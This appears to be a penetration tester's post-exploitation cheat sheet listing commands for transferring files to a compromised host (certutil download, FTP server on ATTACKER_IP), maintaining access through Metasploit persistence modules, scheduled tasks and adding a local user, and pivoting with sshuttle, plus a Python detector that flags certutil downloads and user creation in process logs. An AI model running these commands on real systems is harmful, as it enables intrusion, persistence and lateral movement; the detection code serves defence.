Post Exploitation

File Transfers

  • Certutil

    • certutil.exe -urlcache -f http://IP_ADDRESS/FILE FILE

  • HTTP

    • python -m http.server 80

  • Browser

    • Navigate directly to file

  • FTP

    • python -m pyftpdlib -p 21 (ATTACKER_IP)

  • Linux

    • wget

  • Metasploit

    • Upload / Download feature

Maintaining Access

  • Persistence Scripts

    • run persistence -h

    • exploit/windows/local/persistence

    • exploit/windows/local/registry_persistence

  • Scheduled Tasks

    • run scheduleme

    • run schtaskabuse

  • Add a user

    • net user USERNAME PASSWORD /add
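
The certutil download and net user /add commands listed above leave recognisable process command lines, so a defender can match them in process-creation logs. The sketch below is an added example, not part of the original notes: the rule names, the `classify`/`scan` helpers and the sample lines are assumptions constructed for illustration.

```python
import re
import shlex

URL = re.compile(r"^(https?|ftp)://", re.I)

def _tokens(cmdline):
    """Split a Windows command line, keeping quoted paths as one token."""
    try:
        parts = shlex.split(cmdline, posix=False)  # backslashes stay literal
    except ValueError:                             # unbalanced quote in the log
        parts = cmdline.split()
    return [p.strip('"').lower() for p in parts]

def _switches(args):
    """Switch names with the leading '-' or '/' removed."""
    return {a[1:] for a in args if a.startswith(("-", "/"))}

def classify(cmdline):
    """Return the rule names matched by one process-creation command line."""
    tokens = _tokens(cmdline)
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1]      # drop any directory part
    if image.endswith(".exe"):
        image = image[:-4]
    args, hits = tokens[1:], []
    sw = _switches(args)
    # certutil.exe -urlcache -f http://IP_ADDRESS/FILE FILE
    if image == "certutil" and {"urlcache", "f"} <= sw and any(URL.match(a) for a in args):
        hits.append("certutil_download")
    # net user USERNAME PASSWORD /add  (net.exe hands the work to net1.exe)
    if image in ("net", "net1") and args[:1] == ["user"] and "add" in sw:
        hits.append("local_user_added")
    return hits

# Constructed sample command lines (not taken from a real host).
SAMPLE = [
    r"certutil.exe -urlcache -f http://192.0.2.10/tool.bin tool.bin",
    r'"C:\Windows\System32\CertUtil.exe" /URLCache /F http://192.0.2.10/a.bin a.bin',
    r"certutil -hashfile setup.iso SHA256",
    r"C:\Windows\system32\net1 user svc_backup Passw0rd! /add",
    r"net localgroup administrators",
]

def scan(lines):
    """Return (line_number, rules) for every line that matches a rule."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

if __name__ == "__main__":
    for n, rules in scan(SAMPLE):
        print(n, rules, SAMPLE[n - 1])
```

The hash-only certutil call and the group listing are left unflagged, which keeps the rules from firing on routine administration.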

Pivoting

  • sshuttle can be used to pivot

    • sshuttle -r USER@IP_ADDRESS_1 IP_ADDRESS_2 --ssh-cmd "ssh -i IDENTITY_FILE"

  • Chisel is another tool that can be used to pivot
